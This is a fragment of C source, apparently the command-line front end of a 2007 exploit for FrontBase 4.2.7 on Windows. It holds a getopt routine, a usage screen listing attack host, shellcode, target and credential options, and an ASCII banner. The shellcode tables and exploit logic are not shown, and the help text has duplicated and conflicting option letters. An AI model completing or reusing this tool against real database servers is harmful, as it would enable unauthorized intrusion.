//&nbsp;XGetopt.cpp&nbsp;&nbsp;Version&nbsp;1.2 //&nbsp;----------------------------------------------------------------- int&nbsp;getopt(int&nbsp;argc,&nbsp;char&nbsp;*argv[],&nbsp;char&nbsp;*optstring) { static&nbsp;char&nbsp;*next&nbsp;=&nbsp;NULL; if&nbsp;(optind&nbsp;==&nbsp;0) next&nbsp;=&nbsp;NULL; optarg&nbsp;=&nbsp;NULL; if&nbsp;(next&nbsp;==&nbsp;NULL&nbsp;||&nbsp;*next&nbsp;==&nbsp;\'\') { if&nbsp;(optind&nbsp;==&nbsp;0) optind++; if&nbsp;(optind&nbsp;>=&nbsp;argc&nbsp;||&nbsp;argv[optind][0]&nbsp;!=&nbsp;\'-\'&nbsp;||&nbsp;argv[optind][1]&nbsp;==&nbsp;\'\') { optarg&nbsp;=&nbsp;NULL; if&nbsp;(optind&nbsp;<&nbsp;argc) optarg&nbsp;=&nbsp;argv[optind]; return&nbsp;EOF; } if&nbsp;(strcmp(argv[optind],&nbsp;\"--\")&nbsp;==&nbsp;0) { optind++; optarg&nbsp;=&nbsp;NULL; if&nbsp;(optind&nbsp;<&nbsp;argc) optarg&nbsp;=&nbsp;argv[optind]; return&nbsp;EOF; } next&nbsp;=&nbsp;argv[optind]; next++; //&nbsp;skip&nbsp;past&nbsp;- optind++; } char&nbsp;c&nbsp;=&nbsp;*next++; char&nbsp;*cp&nbsp;=&nbsp;strchr(optstring,&nbsp;c); if&nbsp;(cp&nbsp;==&nbsp;NULL&nbsp;||&nbsp;c&nbsp;==&nbsp;\':\') return&nbsp;\'?\'; cp++; if&nbsp;(*cp&nbsp;==&nbsp;\':\') { if&nbsp;(*next&nbsp;!=&nbsp;\'\') { optarg&nbsp;=&nbsp;next; next&nbsp;=&nbsp;NULL; } else&nbsp;if&nbsp;(optind&nbsp;<&nbsp;argc) { optarg&nbsp;=&nbsp;argv[optind]; optind++; } else { return&nbsp;\'?\'; } } return&nbsp;c; } //&nbsp;----------------------------------------------------------------- //&nbsp;----------------------------------------------------------------- //&nbsp;----------------------------------------------------------------- void&nbsp;usage(char&nbsp;*&nbsp;s) { printf(\"&nbsp;Usage: \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;%s&nbsp;-h&nbsp;<host>&nbsp;-p&nbsp;<port>&nbsp;-s&nbsp;<shellcode>&nbsp;-t&nbsp;<target>&nbsp;-u&nbsp;<user>&nbsp;-p&nbsp;<password>&nbsp;-d&nbsp;<database>&nbsp;-D&nbsp;<dbpassword> \",&nbsp;s); &nbsp;&nbsp;&nbsp;&nbsp;printf(\"&nbsp;-----------------------------------------------------------------------&nbsp; \"); printf(\"&nbsp;Arguments: \"); printf(\" \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-h&nbsp;<host>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;the&nbsp;host&nbsp;IP&nbsp;to&nbsp;attack \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;<port>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;the&nbsp;port&nbsp;of&nbsp;server&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;-1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;) \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-s&nbsp;<shellcode>&nbsp;&nbsp;shellcode&nbsp;number&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;) \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-t&nbsp;<target>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;number&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;) \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-t&nbsp;<target>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;target&nbsp;number&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;) \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-u&nbsp;<user>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;user&nbsp;name&nbsp;of&nbsp;frontbase&nbsp;&nbsp;(default:&nbsp;_SYSTEM) \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-p&nbsp;<passwrod>&nbsp;&nbsp;&nbsp;user&nbsp;password&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;<blank>) \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-d&nbsp;<database>&nbsp;&nbsp;&nbsp;database&nbsp;(if&nbsp;port&nbsp;=&nbsp;-1)&nbsp;(default:&nbsp;<blank>) \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-d&nbsp;<dbpassword>&nbsp;database&nbsp;password&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(default:&nbsp;<blank>) \"); printf(\" \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;Shellcodes: \"); for(int&nbsp;i=0;&nbsp;shellcodes[i].name!=0;i++) { printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;%d.&nbsp;%s&nbsp;Size=%d \",i+1,shellcodes[i].name,&nbsp;strlen(shellcodes[i].shellcode)); } printf(\" \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;Targets: \"); for(int&nbsp;j=0;&nbsp;targets[j].t!=0;j++) { printf(\"&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;%d.&nbsp;%s \",j+1,targets[j].t); } printf(\" \"); printf(\"&nbsp;Examples: \"); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;%s&nbsp;-h&nbsp;127.0.0.1&nbsp;-d&nbsp;NewDB \",&nbsp;s); printf(\"&nbsp;&nbsp;&nbsp;&nbsp;%s&nbsp;-h&nbsp;127.0.0.1&nbsp;-p&nbsp;1155&nbsp;-u&nbsp;root&nbsp;-p&nbsp;dta&nbsp;-D&nbsp;dta&nbsp;-t&nbsp;1 \",&nbsp;s); printf(\"&nbsp;-----------------------------------------------------------------------&nbsp; \"); } void&nbsp;logo() { printf(\"&nbsp;#######################################################################&nbsp; \"); printf(\"&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;____&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;__&nbsp;&nbsp;_&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;______&nbsp;&nbsp;__&nbsp;&nbsp;&nbsp;&nbsp;_____&nbsp;# \"); printf(\"&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;__&nbsp;\\________&nbsp;&nbsp;_____/&nbsp;/_(_)_________&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;__/\\&nbsp;\\/&nbsp;/&nbsp;&nbsp;&nbsp;/&nbsp;_&nbsp;&nbsp;/&nbsp;# \"); printf(\"&nbsp;#&nbsp;&nbsp;&nbsp;/&nbsp;/&nbsp;/&nbsp;/&nbsp;___/&nbsp;_&nbsp;\\/&nbsp;__&nbsp;/&nbsp;__/&nbsp;/&nbsp;___/&nbsp;__&nbsp;/&nbsp;___&nbsp;&nbsp;/&nbsp;/&nbsp;&nbsp;&nbsp;&nbsp;\\&nbsp;&nbsp;/&nbsp;&nbsp;&nbsp;/&nbsp;//&nbsp;/&nbsp;&nbsp;# \"); printf(\"&nbsp;#&nbsp;&nbsp;/&nbsp;/_/&nbsp;/&nbsp;/&nbsp;/&nbsp;&nbsp;___/&nbsp;/_//&nbsp;/_/&nbsp;/&nbsp;/__/&nbsp;/_//&nbsp;/__/&nbsp;/&nbsp;_/&nbsp;&nbsp;&nbsp;&nbsp;/&nbsp;&nbsp;\\&nbsp;&nbsp;/&nbsp;___/&nbsp;&nbsp;&nbsp;# \"); printf(\"&nbsp;#&nbsp;/_____/_/&nbsp;&nbsp;\\___/&nbsp;\\_,_/\\__/_/\\___/\\__,_/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/_/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/_/\\_\\/_/&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# \"); printf(\"&nbsp;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;crew&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# \"); printf(\"&nbsp;#######################################################################&nbsp; \"); printf(\"&nbsp;#&nbsp;&nbsp;Exploit&nbsp;:&nbsp;Frontbase&nbsp;<=&nbsp;4.2.7&nbsp;for&nbsp;Windows&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp; \"); printf(\"&nbsp;#&nbsp;&nbsp;Author&nbsp;&nbsp;:&nbsp;Heretic2&nbsp;(heretic2x@gmail.com)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp; \"); printf(\"&nbsp;#&nbsp;&nbsp;Version&nbsp;:&nbsp;1.1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp; \"); printf(\"&nbsp;#&nbsp;&nbsp;System&nbsp;&nbsp;:&nbsp;Windows&nbsp;2000&nbsp;SP4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp; \"); printf(\"&nbsp;#&nbsp;&nbsp;Date&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;25.03.2007&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp; \"); printf(\"&nbsp;#&nbsp;-------------------------------------------------------------------&nbsp;#&nbsp; \"); } &nbsp;